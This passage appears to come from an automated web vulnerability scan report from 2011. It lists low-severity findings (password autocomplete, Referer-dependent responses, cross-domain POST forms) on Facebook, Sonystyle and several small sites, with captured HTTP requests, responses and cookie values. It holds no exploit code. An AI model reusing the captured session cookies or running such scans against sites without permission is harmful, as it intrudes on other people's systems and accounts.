Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

7.3. https://www.sonystyle.com/webapp/wcs/stores/servlet/CRMPortalHome

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CRMPortalHome

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /webapp/wcs/stores/servlet/CRMPortalHome HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 78487
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:27 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Content-Length: 78487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadInclude
...[SNIP]...
</div>
<form name="profile_info" action="Logon" method="post">
<!-- BEGIN Hidden Fields -->
...[SNIP]...
</label>
<input name="logonPassword" maxlength="25" type="password" /></li>
...[SNIP]...

8. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.

Request 1

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4e035ae8217e38c49740601" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></span></
...[SNIP]...

Request 2

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.5.35
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:49 GMT
Content-Length: 13092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div id="connect_widget_4e035afdbb4715c58767866" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text"></span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></span></
...[SNIP]...

9. Cross-domain POST
There are 23 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://wiki.novemberborn.net/sifr3/DetectingCSSLoad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.novemberborn.net
Path:   /sifr3/DetectingCSSLoad

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sifr3/DetectingCSSLoad HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Wed, 25 Feb 2009 20:37:20 GMT
ETag: "679-1b17-463c433c30000"
Accept-Ranges: bytes
Content-Length: 6935
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>DetectingCSSLoad in sIFR 3 Documentation & FAQ</title>
   

<link href="/styleshee
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.2. http://wiki.novemberborn.net/sifr3/JavaScript+Configuration

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.novemberborn.net
Path:   /sifr3/JavaScript+Configuration

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sifr3/JavaScript+Configuration HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Wed, 25 Feb 2009 22:00:23 GMT
ETag: "68d-29fb-463c55cc58bc0"
Accept-Ranges: bytes
Content-Length: 10747
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>JavaScript Configuration in sIFR 3 Documentation & FAQ</title>
   

<link href="/s
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.3. http://wiki.novemberborn.net/sifr3/JavaScript+Methods

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.novemberborn.net
Path:   /sifr3/JavaScript+Methods

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sifr3/JavaScript+Methods HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:35 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Sun, 29 Nov 2009 17:29:14 GMT
ETag: "68e-3de8-47985dd1b2e80"
Accept-Ranges: bytes
Content-Length: 15848
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>JavaScript Methods in sIFR 3 Documentation & FAQ</title>
   

<link href="/stylesh
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.4. http://wiki.novemberborn.net/sifr3/Styling

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.novemberborn.net
Path:   /sifr3/Styling

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /sifr3/Styling HTTP/1.1
Host: wiki.novemberborn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:36 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Sun, 29 Nov 2009 17:32:47 GMT
ETag: "699-2c27-47985e9cd4dc0"
Accept-Ranges: bytes
Content-Length: 11303
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<title>Styling in sIFR 3 Documentation & FAQ</title>
   

<link href="/stylesheets/instik
...[SNIP]...
</p>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<p class="img">
...[SNIP]...

9.5. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
</p>

<form name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <fieldset>
...[SNIP]...

9.6. http://www.omnitechsupport.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.1.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<tr>
                   <form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

9.7. http://www.omnitechsupport.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.1.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<form name="form1" method="post" action="https://secure.logmeinrescue.com/Customer/Download.aspx?EntryID=215642">
<tr>
...[SNIP]...

9.8. http://www.omnitechsupport.com/about.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /about.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /about.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.4.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<tr>
                   <form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

9.9. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td width="159" align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.10. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.11. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td width="161" align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.12. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.13. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.14. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



